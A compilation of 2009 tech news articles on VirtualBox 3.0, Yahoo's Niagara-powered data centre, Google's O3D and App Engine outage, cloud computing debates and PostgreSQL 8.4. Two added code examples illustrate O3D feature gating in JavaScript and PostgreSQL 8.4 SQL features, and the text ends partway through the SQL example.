TheRegister: Sun's VirtualBox 3.0 exits betaland
by Timothy Prickett Morgan
Update: This story originally said that Sun had not open-sourced VirtualBox. Sun does offer an open source version
Only two weeks ago, Sun Microsystems quietly kicked out two quick betas of its VirtualBox 3.0 desktop and sometimes server-virtualization hypervisor, and today, the product is ready for prime time.
That was a short beta program, wasn't it?
VirtualBox will go down in its history as one of the most popular programs distributed by Sun Microsystems just ahead of its $5.6bn takeover by software giant and hardware wan(not)abe Oracle a few weeks from now.
According to Andy Hall, the senior product manager at Sun who speaks for VirtualBox, Sun was trying to be low-key about the VirtualBox 3.0 beta, but thanks in part to El Reg and a few other trade rags that caught the beta slipping out, Sun got over 25,000 people to download the code in the past two weeks and give it a whirl.
All told, Sun saw over 1 million downloads in both April and May of this year, hitting 14.5 million downloads in total since VirtualBox was launched in October 2007 by German software company Innotek (acquired by Sun in February 2008). Product registrations have crested above 4 million. "The rate of downloads is actually accelerating, and so is the rate of registrations," says Hall, adding that the conversion rate is quite high. "We're really pleased by the snowballing effect."
Sun has not talked about the conversion that perhaps matters most: how many people have opted to pay the piddling $30 per year that Sun charges for tech support on VirtualBox.
As El Reg reported two weeks ago, VirtualBox 3.0 is a major upgrade of the product.
The most important new feature is virtual SMP support that now allows a single VirtualBox guest operating system to span as many as 32 virtual processors on x64 machines. A virtual processor in VirtualBox lingo, I've been told, is one core no matter how many threads it has supporting simultaneous multithreading.
This expanded virtual SMP support for VirtualBox partitions requires VT-x features on Intel's Core and Xeon processors and AMD-V features on Advanced Micro Devices' Athlon and Opteron processors - and with this expansion, VirtualBox will be able to easily create a single partition on the biggest four-socket x64 iron on the market.
Not that this is practical or desirable considering that a guest partition can only support 16 GB of main memory - 512 MB per core is not a balanced configuration on a 32-core server.
So it's reasonable to assume that one of the next features Sun (or Oracle) will put into the next VirtualBox release is support for a lot more main memory per guest - at least 64GB and maybe as high as 256GB. Hall was mum on the subject.
VirtualBox 3.0 also has Direct3D 8 and 9 graphics support for applications, which allows design programs, modeling applications, and games to run in guests and make use of these graphics functions from inside guest operating systems. The software also includes support for OpenGL 2.0 graphics, which are supported in Linux, Windows, and Solaris.
VirtualBox is a type 2 hypervisor, rather than a type 1 (bare metal) hypervisor, which means it runs atop Windows, Linux, Mac OS, or Solaris (the host environment) and then slices up the CPU, memory, and I/O capacity of the machine to support multiple guest operating systems. (There are lots of different guests, but Mac OS is not one of them because Apple has rules about virtualizing its OS). Hall says that Sun has no plans to create a bare-metal version of VirtualBox, a project that its rival on desktops, Parallels, is taking on, and Citrix is working with Intel to create as well for desktops.
If Sun were not in the process of being subsumed into Oracle, which itself is picking over the carcass of Virtual Iron to make a beefed up version of the Xen hypervisor, Sun might have come to the realization that turning VirtualBox into a type 1 hypervisor is a better idea than trying to cook up another variant of Xen using OpenSolaris as the wrapper for the hypervisor. This is what Sun's xVM Server hypervisor was supposed to be, but now, it is something like nine months late to market and very likely never to see the light of day because if Oracle doesn't need one thing, it is three different Xen hypervisor stacks. The kindest thing to do might be to sell off VirtualBox and let it live by itself. Maybe Oracle will be kind and do that. (OK, you don't have to laugh that hard....)
Hall says that Sun doesn't track how customers are deploying VirtualBox but that anecdotal evidence suggests that it is seeing more and more action on servers. At the recent JavaOne trade show in San Francisco, Sun plunked down a bunch of racks of x64 servers running Solaris 10 and put VirtualBox atop of that Unix to allow it to drive virtualized Windows 7, Ubuntu, or Solaris images from Sun Ray thin clients. Anyone attending JavaOne got a smart card that let them log into the virtual desktop system, and they could pick whatever platform they wanted. Hall says Sun set up the infrastructure so it could generate and manage as many as 21,000 unique desktops over the course of the event, and some 16,000 desktops were created by attendees.
Even with the Oracle acquisition looming, Hall says the VirtualBox team is keeping focused and is getting set to kick off a community-driven Web console project for managing multiple guests across the network. Sun could have - and maybe should have - opted to use xVM OpsCenter, the management tool that was supposed to span all of Sun's different server and desktop virtualization products (dynamic domains, Solaris containers, and logical domains on Sparc boxes and Xen partitions, Solaris containers, and VirtualBox slices on x64 iron).
But with Oracle probably converging around a Xen stack once the Sun deal is done, it is probably time for VirtualBox to get its own management tools. Hall says that VirtualBox 3.0 already has some APIs that have been changed to expose management features and that it will be working with a number of independent projects that have already been started out there on the Web to create a single console written in Python. This project is expected to launch "in a few months," according to Hall.
Provided Oracle doesn't step on it, of course. With VirtualBox being open source, what Oracle does or doesn't do doesn't matter a damned bit. VirtualBox can live on. ®
CNet: Yahoo redesigns data center, ditches carbon offsets
by Tom Krazit
Yahoo thinks its plan for a new data center could eventually help the company achieve carbon-neutral status without having to resort to the purchase of carbon offsets.
Yahoo designed its forthcoming data center to let outside air cool the servers at all times, borrowing the idea from the design of a chicken coop, according to Yahoo co-founder David Filo. The company joined New York officials such as Governor David Patterson and Senator Charles Schumer Tuesday to unveil plans for the data center, the design of which Yahoo is attempting to patent.
Data centers are vital to huge Internet businesses such as Yahoo, and companies throughout this industry have started paying more and more attention to the amount of energy consumed by facilities that can have thousands of servers running all day, every day. Google has talked up its own push for greater efficiency in its data centers, and Microsoft just announced plans for two new data centers geared around energy efficiency.
As part of the announcement of the new data center in Lockport, N.Y., just outside of Buffalo, Yahoo also revealed that it will no longer purchase carbon offsets as part of its energy strategy. Carbon offsets have been controversial in some quarters, but they allow companies to claim they are "carbon neutral," in that purchasing offsets diverts money to green projects.
Yahoo plans to focus its green strategy on projects such as the Buffalo data center rather than the purchase of offsets, which means it will take them some time to return to the carbon-neutral goal set in 2007. "We believe creating highly-efficient data centers will have a greater long-term, direct impact on the environment and gives us the best opportunity to play a leadership role in addressing climate change," Filo wrote.
Corrected at 3:05 p.m.: Yahoo clarified the new data center will be in Lockport, N.Y., just outside of Buffalo.
InfoWorld: Google bolsters 3-D API for browser
by Paul Krill
Google this week began offering a "substantial" update to its O3D API for building rich, interactive 3-D applications in a browser, tuning it for different types of hardware.
Highlighted at the Google I/O conference in May and shown running in a Google Chrome browser at that time, O3D enables 3-D graphics and features a JavaScript API. It began as an effort to establish an open Web standard for 3-D graphics. An update was released Monday.
"With today's release, we focused on addressing a theme we heard in the requests and feedback from the community: That O3D should run as well as possible on many different types of hardware," said Google product manager Henry Bridge in a blog post. "Toward that end, we're releasing two new additions: Software rendering and feature requirements. If you've already installed the O3D plugin, you should receive these additions automatically."
Software rendering lets O3D use the main processor to render 3-D images if the machine running the application does not have supported graphics hardware. The concept of feature requirements, meanwhile, will help minimize how often O3D has to fall back to software rendering.
"Feature requirements allow developers to state upfront that their app will require certain hardware capabilities to render properly. If the machine running the app supports those features, O3D will run it fully hardware accelerated; if however, it is lacking any of the required capabilities, O3D will drop into a software rendered mode," Bridge said.
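The capability-gating pattern Bridge describes, written out as an added example (this is not O3D's or Google's code). Every feature name, the `queryGraphicsCapabilities()` probe and the machine profiles are constructed placeholders standing in for whatever the real plugin exposes. It goes one step beyond the article: a requirement the software renderer cannot emulate either, or a misspelled requirement, is reported as unsupported instead of silently dropping the app into software mode.

```javascript
// Added example, not O3D's own code. Demonstrates "feature requirements":
// an app declares the hardware capabilities it needs, and the runtime
// either runs it hardware-accelerated or drops to software rendering.

// Feature names this example runtime understands (constructed).
const KNOWN_FEATURES = new Set([
  'floating_point_textures',
  'large_geometry',
  'shader_model_3',
]);

// What this example's software renderer can emulate (constructed).
// Anything outside this set cannot be satisfied by falling back.
const SOFTWARE_RENDERER_FEATURES = new Set([
  'floating_point_textures',
  'large_geometry',
]);

// Decide how to run an app given the features it requires and the features
// the graphics hardware reports.
// Returns { mode: 'hardware' | 'software' | 'unsupported', missing, unknown }.
function selectRenderMode(requiredFeatures, hardwareFeatures) {
  const unknown = requiredFeatures.filter((f) => !KNOWN_FEATURES.has(f));
  if (unknown.length > 0) {
    // A misspelled requirement should fail loudly at development time rather
    // than silently push every user into software rendering.
    return { mode: 'unsupported', missing: [], unknown };
  }
  const hw = new Set(hardwareFeatures);
  const missing = requiredFeatures.filter((f) => !hw.has(f));
  if (missing.length === 0) {
    return { mode: 'hardware', missing: [], unknown: [] };
  }
  const beyondSoftware = missing.filter((f) => !SOFTWARE_RENDERER_FEATURES.has(f));
  if (beyondSoftware.length > 0) {
    return { mode: 'unsupported', missing: beyondSoftware, unknown: [] };
  }
  return { mode: 'software', missing, unknown: [] };
}

// Hypothetical capability probe: a real runtime would ask the GPU driver.
// Here it returns constructed answers so the example runs offline.
function queryGraphicsCapabilities(machineProfile) {
  const profiles = {
    workstation: ['floating_point_textures', 'large_geometry', 'shader_model_3'],
    netbook: ['large_geometry'],
    none: [],
  };
  return profiles[machineProfile] || [];
}

// Startup glue an app would call once, before creating any rendering client.
function startApp(requiredFeatures, machineProfile) {
  const caps = queryGraphicsCapabilities(machineProfile);
  return selectRenderMode(requiredFeatures, caps).mode;
}

console.log(startApp(['floating_point_textures'], 'workstation')); // hardware
console.log(startApp(['floating_point_textures'], 'netbook'));     // software
console.log(startApp(['shader_model_3'], 'netbook'));              // unsupported
```

The deciding function is kept separate from the capability probe so the decision logic can be unit-tested with fabricated capability lists, which is also how you would verify that a requirement list never quietly degrades every user's experience.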
Other features include a full-screen mode to make O3D applications more absorbing and a community gallery featuring demonstrations that use O3D. Developers can submit applications for inclusion in the gallery.
O3D is intended to use hardware acceleration on a variety of GPU chip sets to provide high-end real-time 3-D graphics on most systems.
TheRegister: Niagara Falls to power next Yahoo! data centre
by Timothy Prickett Morgan
In one of the brighter moments of New York governor David Patterson's unanticipated and beleaguered administration, Yahoo! has announced that it will plunk down its next data centre just east of Buffalo, New York, so it can tap the carbon-free hydroelectric power generated by Niagara Falls.
When - not if - New York City has a blackout, as it gets very hot in the summer and there are not enough megawatts to go around, we'll all know who to blame. It will be the exclamation point that broke the generator's back.
Governor Patterson - who has his hands tied by a deadlocked state senate that has been refusing to do its job because it cannot decide which party is in charge - and (federal) Senator Chuck Schumer of New York have been pushing to win the $150m Yahoo! data centre deal for Buffalo. They got some credit from David Dibble, Yahoo!'s executive vice president of service engineering and operations, who announced the winning bid.
But the real reason why this deal went down in New York - and not in Ohio, Pennsylvania, Illinois or Virginia, as was reported in the Albany Business Review - is the New York Power Authority. It runs the hydropower in western New York, which has Niagara Falls as its main generating facility. NYPA has guaranteed a total of 15 megawatts of hydropower that the Business Review says will save Yahoo! around $100m over a 15-year period.
The statement put out by Patterson's office concerning the Yahoo! data centres says it will be located in the town of Lockport, east of Buffalo in Niagara County. Yahoo! plans to invest "tens of millions of dollars" to put its East Coast regional data centre, weighing in at 190,000 square feet, on a 30-acre plot in an industrial park. Not counting construction work, the data centre is expected to create 125 jobs.
The Lockport data centre has been allocated 10 megawatts of power during the initial construction phase and data centre buildup. Construction is expected to start in August, with the first phase of the facility being operational in January 2011. In a second phase that starts in the spring of 2012, Yahoo! will build out the Lockport data centre, spending an additional "tens of millions of dollars," and would get an extra allotment of 5 megawatts of guaranteed power from NYPA.
Based on that power consumption, you would assume that another 95,000 square feet of data centre space will be built in the second phase of the project. It is not clear how many servers Yahoo! will put into the data centre, but using modern half-width two-socket "Nehalem EP" servers, you could put about 167,000 server nodes in that 190,000 square feet of space. The second phase of the Lockport data centre would push it up to around 250,000 server nodes.
Western New York has been courting big data centres thanks to the relatively cheap electricity it can generate from Niagara Falls, and was disappointed last year when HSBC pulled the plug on a $139m, 275,000 square foot data centre that was to open in nearby Cambria, New York. The subprime mortgage mess killed that deal, and HSBC decided to load up its data centres in Chicago rather than pour new concrete in Cambria. It is also planning to shut down facilities in Buffalo and the suburb city of Amherst.
Bringing in Yahoo! to replace the lost HSBC centres was something all politicians were clearly interested in doing. This is why so many of them lined up in Patterson's statement. Still, we're talking about 125 jobs and maybe an aggregate payroll for them of $8m to $9m. The incentives that New York state and the regional governments gave were not divulged, but those jobs are only worth about $125m to $130m over a 15-year term. Hopefully the economics works out in the long run.
According to a report at CNET, Yahoo! co-founder David Filo said the Lockport data centre will use outside air for cooling, something you can do for many months of the year in the chilly Buffalo region. Filo also said that Yahoo! would stop buying carbon offsets in an effort to make itself carbon neutral, and would instead focus on getting its data centres to be as efficient as possible. ®
InfoWorld: RSA: Cloud computing not secure enough
by Sumner Lemon
Cloud-based services are being rolled out without enough attention being paid to securing these services and the information they handle. That was the finding of a recent study commissioned by RSA Security.
While the report's findings are alarming, there is still time for providers of these services to address the problem, said Art Coviello, executive vice president at EMC and president of RSA Security. The key is to look at security as an integral part of the service and not as an add-on feature, he said.
Coviello recently sat down with IDG News Service to discuss the security of cloud-based services. What follows is an edited transcript of that conversation:
Art Coviello: It was startling to me that a lot of this cloud computing was being done with security left behind, because I viewed cloud computing as an opportunity to really change the way people approached security. In essence, you're rebuilding the information infrastructure from the ground up. It'll be years before all these legacy systems get moved over, either to internal, private clouds or external clouds, or some combination thereof. Ultimately, that's where it's headed and because of that, because we have knowledge and forethought of all the issues we've had in security over the last decade and a half.
One would think that we've learned our lesson about building security in. Having said that, it's still very early days. Although I find the research alarming, I don't necessarily find it conclusive that this is the way it will turn out.
IDGNS: Is part of the problem that vendors aren't necessarily liable for all of the risk associated with offering these services? Would the services be more secure if they had to fully assume all of that risk?
Coviello: It could be if the person that purchases these services is not careful. But it's hard to imagine that any responsible provider of these services would deliberately make their offering insecure. Woe unto them, they'll be out of business pretty quick. The one thing you can rest assured of is if there's any security breach in one of these services, someone is just going to take their infrastructure and go elsewhere. It's a lot easier to do that in a cloud environment than it might be if you've outsourced your infrastructure.
IDGNS: How does a company know that a cloud-computing provider offers a secure service?
Coviello: Enterprises have the wherewithal and the skill to evaluate the cloud provider's capability and their capability in security, and they would be stupid not to do a thorough investigation because they're outsourcing everything.
IDGNS: What do you think is the greatest security weakness for cloud-computing services?
Coviello: It's almost too early to tell. How many instances do you see of cloud computing out there? I can give you a number of places where there could be insecurities. What people tend to worry about is the co-mingling of information, and that's probably the least of anybody's worries because it's very easy to partition data. What they ought to be more worried about is what are the access controls, what the authentication mechanisms are, how you ensure information doesn't somehow leak out to somebody outside.
I'd worry about those things, but these are things that are going to have to be investigated and developed as people start to get a feeling for what cloud computing is all about.
CNet: Open source to shape cloud computing, but not dominate it
by Matt Asay
Redmonk analyst Stephen O'Grady writes a bleak, but likely accurate, eulogy for open source's relevance to cloud computing. In a world where horsepower matters more than the software feeding those "horses," in terms of the entry cost to compete, and where big vendors like Amazon and Google are already divvying up the market, the odds of a small-fry, open-source start-up challenging "Goliath" are slim.
It's not a new argument: Nick Carr has been suggesting for some time that only a few, big companies can afford relevance in this hardware-intensive business.
Given this fact, O'Grady thinks the best we can hope for (and he thinks it's pretty important) is "a loose coalition or confederation of [open-source] projects and vendors that will together comprise an increasingly viable top to bottom alternative to some of the cloud providers today." He includes projects like Puppet (Reductive Labs) and Hadoop in this mix, but is careful to point out that he doesn't see a full-fledged, open-source alternative seriously challenging the closed platforms of Google, Amazon, Salesforce, and the other mega-clouds.
This 'David' alternative to the 'Goliath' big vendors doesn't beat them, but instead helps to keep Goliath honest. Really, when you think about it for more than a few seconds, that's what open source has done for traditional computing, too.
Look around. The big vendors controlling IT and the Web are...the same vendors that controlled it yesterday, and are likely the same vendors that will control it 10 years from now. Sure, they'll swap places for a few years, but does anyone really believe that IBM and Microsoft won't still be cat-fighting a decade from now?
But now consider what open source has been doing, mostly behind the scenes. Open source is changing the way these big vendors operate, because it's altering customer expectations.
Open source has permeated Microsoft to the point that it is now considering throwing its weight behind the Spring Framework and other open-source projects.
Google, for its part, went from a happy consumer of open source to an active contributor to open source on a very big scale. Not because Google is "not evil," but because it realizes that open source can give it a competitive advantage in the market.
We'll see more of this as open source challenges otherwise proprietary vendors to compete through openness. We're already seeing some of this as vendors like Red Hat seek to claim parts of the cloud for open source.
In so doing, open source will continue to challenge and change the buying conversation, resetting expectations to transparency, something we desperately need: if the allegation that the Bill and Melinda Gates Foundation is pressuring governments to buy Microsoft technologies is even remotely true, the best antidote may be open-source procurement policies.
In sum, don't expect open source to "win" in the cloud; at least, not in the form of an open-source vendor doing the winning. Rather, look to open source to influence, to shape the cloud.
Just like it has to traditional, proprietary software.
InfoWorld: Sun upgrades freeware virtualization tool
by Tom Jowitt
Sun has upgraded one of its most popular freeware products after releasing a major new version of its open-source virtualization tool xVM VirtualBox, which includes the ability to cope with demanding server workloads.
VirtualBox proved popular when it first appeared back in 2007 from Stuttgart, Germany-based Innotek. Sun later acquired Innotek in February 2008. At the time, Sun revealed that the product had been downloaded over 4 million times, but Sun now says it has surpassed 14.5 million downloads and 4 million registrations worldwide, as well as more than 25,000 downloads a day.
So what is VirtualBox? Well, it is an x86 virtualization product designed for both enterprise and home use. Essentially it is both a desktop and server-virtualization hypervisor, and is freely available as open source software under the terms of the GNU General Public License (GPL).
It runs on Windows, Linux, Macintosh, and OpenSolaris hosts, and supports a large number of guest operating systems including Windows (NT 4.0, 2000, XP, Server 2003, Vista, Windows 7), DOS/Windows 3.x, Linux (2.4 and 2.6), Solaris and OpenSolaris, and OpenBSD.
Put simply, if a user downloaded and installed VirtualBox onto their laptop, they could then run most any other popular operating system on the same machine besides its native OS. Or they could run several operating systems at the same time, depending on what hardware resources are available.
This makes it an incredibly useful tool for software developers who want to target multiple operating systems in order to maximize their audience and return on investment (ROI). VirtualBox gives them the opportunity to run things such as test environments on a single laptop, for example.
Back in September last year, Sun said it had improved VirtualBox's performance and platform support when it released VirtualBox 2.0. But now the company has released a major upgrade, version 3.0, which it says offers improved desktop and server virtualization features.
On the desktop side, it now offers Microsoft Direct3D support for Windows guests, which allows graphically intensive Windows applications, such as computer modelling, 3D design and games software, to run in a virtual environment. Support for version 2.0 of the Open Graphics Library (OpenGL) standard has also been added, which allows for high performance graphical applications that typically use graphical hardware acceleration. Finally, support for a wider range of USB devices, such as iPods, mobile phones and storage devices, has also been added.
But it is the server side that has seen the most significant updates. With more and more multi-threaded database and Web applications making use of multiple CPUs, VirtualBox 3.0 can now support virtual SMP systems with up to 32 virtual CPUs (vCPUs) in a single virtual machine. This now gives VirtualBox the ability to run 'heavyweight data-processing workloads.'
TheRegister: Google code cloud punts on-demand embarrassment
by Ted Dziuba
Fail and You. Last week, users of Google App Engine - Google's application hosting platform - discovered a new feature in the product: downtime (http://www.theregister.co.uk/2009/07/02/google_app_engine_fail/). App Engine was offline for roughly six hours, and for much of that time, even the status page which tells users about downtime was unavailable. Now that's a strong way to send a message.
As a reminder: Google App Engine is Google's response to Amazon Web Services. Amazon has set up a scheme where customers can have full access to virtual computers and can also pay for scalability-included services like S3 for storage and a messaging system. It's a fair balance between automatic scaling and control. Google, on the other hand, offers developers a Python and Java API to its database back-end and absolutely zero control over the machines on which your application is running.
App Engine developers must go through the effort to contort their program to Google's data storage mechanism, which in some cases can be a far cry from SQL. The benefit to this is that you don't have to worry about scalability, ever. Allegedly. It's sort of like how a heroin addiction means that you don't have to worry about reality, ever.
As with anything that flies through a cloud, Google App Engine can suffer a double flame-out and crash to the ground, killing hundreds and swearing a large subset of the population off of air travel for quite some time. Google has paying customers for App Engine, and maybe Wonka doesn't quite understand this, but when people pay you for a service, they expect a certain amount of transparency and honesty.
Watching Google's response to the App Engine downtime reminded me of the cruel 2008 US Vice Presidential debates, where everyone watching just wanted to pull Sarah Palin aside and say "Sweetie, this is a grown-up event. You need to use your big-girl words now." Google's explanation for six hours of downtime was basically, "Shit got ill."
The meat of Google's postmortem on the failure was this, a message posted to the App Engine e-mail group: "There was a serious issue in one of App Engine's datacenters with GFS, Google's low level storage system. GFS underlies Bigtable, which in turn underlies App Engine's Datastore. GFS also provides storage for our application serving infrastructure, so GFS unavailability caused problems for Datastore reads and writes, as well as application serving."
Let's say that you were tasked with maintaining the computing platform for your company's web services. After six hours of service outage, your supervisor asked you for an explanation of what happened, and you follow Google's lead. You say, "There was a serious issue with one or more of our computers." Ass, meet curb.
Almost a year ago, Amazon's S3 storage service suffered roughly eight hours of downtime. Amazon's postmortem on the failure included details about specific bugs in their message passing system, and how their wonderfully scalable system could also scale errors quite wonderfully. Amazon identified an oversight in their own code with respect to error checking, so as a customer, you could be sure that somebody is on that shit.
Google, on the other hand, doesn't feel like telling anyone exactly why GFS failed. Was it a bug in the code? Was it a traffic issue? Did Augustus Gloop fall into the chocolate river?
As far as preventing future such failures, Google is equally as tight-lipped. Their postmortem only says this: "The team has been actively working on a solution in the medium-term that would allow us to switchover data centers immediately without consistency problems."
Um, fantastic. When will that be deployed? Why specifically could you not fail over in this case? Do you realize that you're being paid for this? By comparison, Amazon outlined four changes they made to their system, in both code and monitoring, to prevent that type of failure from happening again.
One could argue over the necessity of up-time for the types of apps that appear on App Engine. After all, the world only needs so many RSS readers and Twitter clones. But this highlights the greater risk of hosting your applications in the - and oh it pains me to say this, but for the sake of brevity - cloud. Every time there is downtime like this, be it Google App Engine or Amazon Web Services or Microsoft Azure, tech pundits all tell us that it's not ready for prime time. What the fuck does that even mean? My guess: "My editor wanted me to cover this story and I lack the originality to make any meaningful contribution."
I'll go out on a limb here. Hosting production services on platforms like App Engine is never a good idea. It may be fine for some toy application or a web service that you never plan to make any money from, but when your livelihood depends on it, will you really trust the business to a company whose failure response is the technical version of "whoooa, sorry bro, my bad?" Clearly, you can draw a line when it comes to outsourcing. But for serious business, if you can't put your hands on the metal - or order someone else to put their hands on the metal - then you're due for an embarrassment. And it's nobody's fault but your own.
Google's sell really appeals to the engineers, but I hope that the decision makers can see through the bullshit. Automatic scalability? Really? Or did you guys drop too much capital expenditure on machines and have to come up with a way to make a return on that investment? Maybe it's less of a tell than I think it is, but the App Engine main product page has a prominent link to the terms of service at the top, and no link or contact information for support. Google's introverted population certainly knows that it's easier and cheaper to legalese your way out of a customer's problem than it is to hire a person to pick up the phone.
Man, supporting real people is way harder than selling ads. ®
CNet: Three debates that will benefit cloud computing
by James Urquhart
Cloud computing is one of those operations models that has already started to disrupt the way in which everyone consumes software.
It is also starting to have an effect (albeit tiny right now) on the way in which people and organizations consume (or don't consume) hardware. Cloud computing has become a part of the core information technology "fabric" of many.
Cloud computing does, however, generate more than its fair share of disagreement and debate. Vendors, customers, bloggers, twitterers, and even consumers have spent many thousands of hours, hundreds of thousands of words, and millions of dollars trying to convince the world that their view of cloud computing is "the one." Meanwhile, thousands of other very smart people are questioning the core assumptions on which cloud computing's value proposition rests.
You would think this dissent would be detrimental to the adoption and growth of cloud computing, but it's not. Partially that's for the relatively lame reason that every new definition and every new "must-have" feature expand the possibility of what cloud computing is...thereby growing the term "cloud computing" through a sort of linguistic acquisition strategy.
However, it is also in part due to the fact that these debates are spurring a huge amount of brain power to focus on some really difficult-to-solve cloud-related problems. The tension created by disagreement and debate in the cloud computing marketplace is spurring entrepreneurs, vendors, and even individuals to achieve their independent visions of what could be. Tension drives innovation, in this case.
Let me give you three examples of what I am talking about. These are probably the three most important examples of how disagreement is driving technology road maps industrywide. Some of these disagreements are clearly self-serving--established systems vendors protecting their markets while enthusiastic entrepreneurs attempt to redefine the markets outright. Some are just different ways of seeing the same subject, but with profound effects on the choices made by vendors and individuals on each side of the debate.
Consumer and small/midsize business versus enterprise
One of the biggest sources of tension among those that debate cloud computing definitions is the difference between the needs of individuals and small/medium businesses (SMB) versus those of their larger enterprise counterparts.
The former is looking to minimize cost and complexity as much as possible by eliminating the need to own things. Consumer/SMB is a market in which providing service through standardized devices reigns supreme, and the requirement to own anything other than basic access devices (laptops, Netbooks, smartphones, and the like) is detrimental. This marketplace sees the issue as outsourcing as much information technology as possible and is willing to place a high level of trust in providers to achieve that.
Enterprises, however, tend to be much more concerned with maintaining their existing investments in IT while gaining a return on investment for new spending on new technologies or processes. A tremendous amount has been spent on making IT a trusted resource (though clearly with mixed results). Enterprises won't move forward on cloud unless they can maintain that level of trustworthiness without excessive expenditure.
So the consumer/SMB market is trying to drive the enterprise towards pure IT as a service, and the enterprise is trying to get cloud providers to up their game in security, control, service levels, and compliance. All are very good for cloud customers as a whole.
Public cloud versus private cloud
Closely related to the problem of how to run IT is where to run it. And by running it, I don't necessarily mean where the hardware is running, but where the controls that define "the cloud" are maintained. Who owns the systems that manage the cloud and that define things like access rights, available software images, and network service configurations?
This is essentially the heart of the debate about how much service is provided by IT--how much cloud must be on the Internet for it to be cloud. Those who believe "private clouds" are unnecessary generally believe that you can get everything you need from your public cloud provider. Take Amazon Web Services, for instance. Using its console, its messaging infrastructure, its data stores, and so on, many developers are arguing that there is little reason to build and operate new applications anywhere else.
The argument for private clouds, however, is generally based on the risks inherent in external public clouds, such as lock-in, data ownership, regulatory concerns, and security, as well as the alleged ability of private clouds to provide a smoother migration path to external clouds than going straight to public clouds today.
So, the public cloud crowd is pushing internal IT and individuals toward using third-party services to replace capital intensive IT, while the private cloud crowd is pushing cloud service providers to see interacting with existing IT infrastructure as an enabler for cloud adoption. Again, both are good for cloud customers.
Open source versus proprietary
While the previous two arguments have been about how and where to operate IT, this debate is a little different. It is about software technology, and it is actually about much more than cloud computing. On the surface, it's the same old "free versus commercial" debate. But when you dig down from a cloud perspective, you find nuances that will be critical to the future form of the cloud.
You've probably read about the debate regarding whether cloud computing is the logical conclusion of open source. Many open source companies note that in order to profit from open source, they must be exceptional service businesses. As cloud computing is all about service delivery, it is a natural model in which to sell open source services.
That argument, while critical, isn't the whole story, however. The other side of the coin is the debate about whether one can build competitive cloud services using anything other than open source. Most of the leading clouds available today are heavy users of open-source software, and many of the most compelling server images in Amazon's image library are based on open source.
Folks like Microsoft and VMware, however, would beg to differ and are working furiously to prove to the market that their value add is worth the cost of their software. The argument is that these companies can pay for innovation and for a partner ecosystem that drives new business, and have the customer relationships to work through long-term cloud deployment issues.
Here, the open-source community is playing a critical role in driving a new business model for software delivery (free software, for-fee service), while the so-called "proprietary" platforms are building ecosystems that push open source to continually reinforce its value to developers.
In the end, while I have preferences in each of these debates, it is impossible to declare any winners at this point. And that is good, as our constant testing of each other's principles will lead to an ever-increasing richness in cloud computing offerings for years to come.
TheRegister: PostgreSQL trumpets 8.4 release
by Timothy Prickett Morgan
The open source project behind the PostgreSQL relational database is blowing its own trumpet over the availability of PostgreSQL 8.4, a release that includes 293 new or improved features that make the database easier to administer and more useful to programmers and end users.
The new code, which is available for download here, was set to launch on June 29, but had a show-stopper bug that needed to be fixed at the last minute, according to Josh Berkus, a member of the PostgreSQL core development team. The bug related to the standby database failover feature of PostgreSQL that could have potentially caused some data loss for certain setups, so Berkus held up the release for two days to test a bug fix. (The bug fix worked, and if it didn't, then PostgreSQL 8.4 would still not be available).
While there are a plethora of features that database administrators and programmers are going to eat up, the big enhancements in PostgreSQL 8.4 include the ability to do a parallel database restore (which can speed up database recovery time by a factor of two to eight, depending on the underlying iron and how you set it up) and the ability to do "in-place" upgrades from PostgreSQL 8.3 to 8.4 "without extensive downtime." (It would be best, of course, to have no downtime. That's why companies that can't take downtime have high availability clustering of their database servers.) This pg_migrator tool is still in beta, by the way.
PostgreSQL also includes a new set of query monitoring tools, to allow administrators to monitor end users and see what queries they are launching at the database. (Some users, particularly in marketing, are fond of launching complex queries during peak transaction loads and inadvertently cripple system throughput with their crafty questions).
The updated database also includes ANSI SQL:2003 features such as recursive queries, windowing functions, and common table expressions, which let end users pose kinds of questions of their databases that were not possible with PostgreSQL 8.3 and earlier releases. There are enhancements to stored procedures, such as default parameters and variadic parameters, that the project says make database programming simpler and more compact.
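The 8.4 features that paragraph names, worked through as an added example that is not from the article or from the PostgreSQL project. The `employee` table and its rows are constructed for the illustration, and the statements stick to syntax that 8.4 introduced or already had.

```sql
-- Constructed sample data (not from the article): a small reporting chain.
CREATE TABLE employee (
    id         integer PRIMARY KEY,
    name       text    NOT NULL,
    manager_id integer REFERENCES employee (id),
    dept       text    NOT NULL,
    salary     numeric(10,2) NOT NULL
);

INSERT INTO employee (id, name, manager_id, dept, salary) VALUES
    (1, 'Ada',    NULL, 'eng', 200000),
    (2, 'Grace',  1,    'eng', 150000),
    (3, 'Linus',  1,    'eng', 140000),
    (4, 'Ken',    2,    'eng', 120000),
    (5, 'Rob',    3,    'ops', 110000),
    (6, 'Dennis', 5,    'ops', 100000);

-- 1. Recursive common table expression (new in 8.4): walk the whole reporting
--    tree in one statement. The path array doubles as a cycle guard: without
--    the "NOT ... = ANY (r.path)" test, a manager_id loop would recurse forever.
WITH RECURSIVE reports AS (
    SELECT id, name, manager_id, 1 AS depth, ARRAY[id] AS path
    FROM   employee
    WHERE  manager_id IS NULL
  UNION ALL
    SELECT e.id, e.name, e.manager_id, r.depth + 1, r.path || e.id
    FROM   employee e
    JOIN   reports  r ON e.manager_id = r.id
    WHERE  NOT e.id = ANY (r.path)
)
SELECT repeat('  ', depth - 1) || name AS tree, depth
FROM   reports
ORDER  BY path;

-- 2. Window functions (new in 8.4): per-department ranking and running totals
--    that previously needed a self-join or application-side loops.
SELECT name, dept, salary,
       rank()      OVER w                            AS dept_rank,
       sum(salary) OVER w                            AS running_total,
       salary - avg(salary) OVER (PARTITION BY dept) AS vs_dept_avg
FROM   employee
WINDOW w AS (PARTITION BY dept ORDER BY salary DESC)
ORDER  BY dept, dept_rank;

-- 3. Default parameter values (new in 8.4): callers may omit trailing
--    arguments. Named-argument calls arrived later (9.0), so on 8.4 the
--    omitted arguments must be the rightmost ones.
CREATE FUNCTION staff_under(max_salary numeric DEFAULT 1000000,
                            dept_name  text    DEFAULT 'eng')
RETURNS SETOF employee
LANGUAGE sql STABLE AS $$
    SELECT * FROM employee
    WHERE  salary <= $1 AND dept = $2
    ORDER  BY id
$$;

SELECT name FROM staff_under();               -- both defaults
SELECT name FROM staff_under(130000);         -- salary cap only
SELECT name FROM staff_under(130000, 'ops');  -- both arguments given

-- 4. VARIADIC parameter (new in 8.4): a variable-length argument list
--    arrives inside the function as one array.
CREATE FUNCTION smallest(VARIADIC vals numeric[])
RETURNS numeric
LANGUAGE sql IMMUTABLE AS $$
    SELECT min(v) FROM unnest($1) AS u(v)
$$;

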